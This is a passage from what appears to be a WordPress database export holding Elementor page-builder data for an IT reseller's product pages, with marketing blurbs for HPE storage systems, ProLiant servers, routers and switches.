ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c301724\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c16a918\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 8000 Storage<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2518\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-8000-Storage.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesn\\u2019t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af04195\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"b45681b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 9000 Storage<\\/strong><\\/h4>\\n\\n<hr \\/>\\n&nbsp;\\n<img class=\\\"wp-image-2519 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-9000-Storage.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"171\\\" \\/>\\n<p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads \\u2013 for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ffd0fc\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75f50e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"cb4169e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"067e237\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"3849c5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f98d0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"8d4989d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11168cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f816ee3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4cef774\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85f9784\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea7fd08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb3eeba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>NETWORKING<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"021e064\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3645aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"d34cd1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Router<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"304f150\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c7392b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"687ac33\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FLexNetwork MSR95x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2520\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FLexNetwork-MSR95x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"227\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e505229\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"65af13d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Alcatel-Lucent 7750 Service Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2521\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Alcatel-Lucent-7750-Service-Router-Series.png\\\" alt=\\\"\\\" width=\\\"229\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb\\/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f17738e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"6eb923f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FlexNetwork MSR93x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2522\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FlexNetwork-MSR93x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"188\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE\\/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4335c67\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"964afb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f168dc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"479f0a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4f95a1f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3f5f006\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"fed6471\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4419ab2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"145a6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5715260\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aeec70b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"50f2e58\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"99ae68c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Switches<\\/strong><\\/h2>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"823bc65\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f135ea8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f3e7bd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2523\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"165\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot\\/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2d0f78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"9dd34f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2524\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\\\" alt=\\\"\\\" width=\\\"244\\\" height=\\\"184\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100\\/50\\/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100\\/50GbE spine switches. It is optimized for data center hot\\/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5490442\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0fae7b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4c6953\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7341cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"af59a7b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ac4e02\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fa822d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"9\",\"right\":\"9\",\"bottom\":\"9\",\"left\":\"9\",\"isLinked\":true}},\"elements\":[{\"id\":\"608d110\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">To discover more, please click the button below or contact us to discuss your needs.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8409,3634,'_wp_page_template','template-fullwidth.php'),(8410,3634,'_elementor_edit_mode','builder'),(8411,3634,'_elementor_template_type','post'),(8412,3634,'_elementor_version','2.5.14'),(8413,3634,'_elementor_data','[{\"id\":\"e3617cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"43a7986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2911cf1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SERVER AND SYSTEM<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5d09ee\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea019d6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"50f056f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Rack Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.<\\/p>\",\"_border_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6146b0a\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"6698963\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"5ba2b0b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE StoreOnce Systems<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\">\\u00a0<br \\/><img class=\\\"alignnone wp-image-2517\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-StoreOnce-Systems.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"156\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"75d2a69\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"eb529d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 8000 Storage<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2518\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-8000-Storage.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesn\\u2019t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"54d4bd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2796cf3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 9000 Storage<\\/strong><\\/h4>\\n\\n<hr \\/>\\n&nbsp;\\n<img class=\\\"wp-image-2519 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-9000-Storage.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"171\\\" \\/>\\n<p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads \\u2013 for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ba1eaa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"736e3d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"bf473fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL325 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2509 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL325-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Secure and versatile single socket (1P) 1U AMD EPYC\\u2122 based platform offers an exceptional balance of processor, memory and I\\/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ba9d094\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f64c755\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL385 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2511 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL385-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e4020c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4e09160\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Apollo 6000 Chassis<\\/strong><\\/h4><hr \\/><p><img class=\\\"alignnone wp-image-2512 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Apollo-6000-Chassis.png\\\" alt=\\\"\\\" width=\\\"235\\\" height=\\\"160\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customer\\u2019s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cf4a7d2\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"34c9825\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c6c2e78\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"611dff3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"bbf6243\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"65d7d46\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f5ccf11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton 